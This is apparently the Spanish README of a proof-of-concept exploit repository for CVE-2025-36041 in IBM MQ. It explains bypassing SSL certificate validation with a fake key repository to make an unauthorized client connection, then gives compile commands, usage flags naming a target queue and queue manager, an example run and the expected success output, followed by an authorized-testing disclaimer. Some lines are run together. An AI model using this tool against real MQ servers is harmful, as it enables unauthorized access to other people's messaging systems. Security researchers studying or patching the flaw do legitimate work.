
Exploit (C) de la vulnerabilidad CVE-2025-36041 en IBM MQ
Este repositorio contiene un exploit de prueba de concepto (PoC) para CVE-2025-36041, una vulnerabilidad en IBM MQ (Message Queue) que permite eludir la validación de certificados SSL. Al inyectar un certificado SSL falso y usar parámetros MQCONNX personalizados, se puede establecer una conexión de cliente no autorizada a un servidor IBM MQ.
"Hello MQ") para confirmar la explotación exitosa.Asegúrese de que las bibliotecas cliente de IBM MQ estén instaladas y las variables de entorno (MQ_INCLUDE_PATH, ) estén configuradas adecuadamente.
MQ_LIB_PATHgcc exploit.c argparse.c -o CVE-2025-36041
-I/path/to/mqm/include
-L/path/to/mqm/lib -lmqm
./CVE-2025-36041
-p /path/to/fake/ssl
-n TARGET.QUEUE.NAME
-m QM1
Parámetros:
-p, --path Ruta al directorio del KeyRepository SSL falso.-n, --name Nombre de la cola objetivo para abrir y enviar el mensaje.-m, --qmgr Nombre del Gestor de Colas../CVE-2025-36041 -p ./fake_ssl_repo -n MY.QUEUE -m QM1
Si tiene éxito, verá:
[+] Starting connection to IBM MQ... [+] Connected successfully with fake SSL! [+] Message sent successfully!
Solo para pruebas de penetración autorizadas y fines educativos. El uso no autorizado de este PoC puede violar las leyes y regulaciones locales. El autor no asume ninguna responsabilidad por el uso indebido.
Autor: Byte Reaper CVE: CVE-2025-36041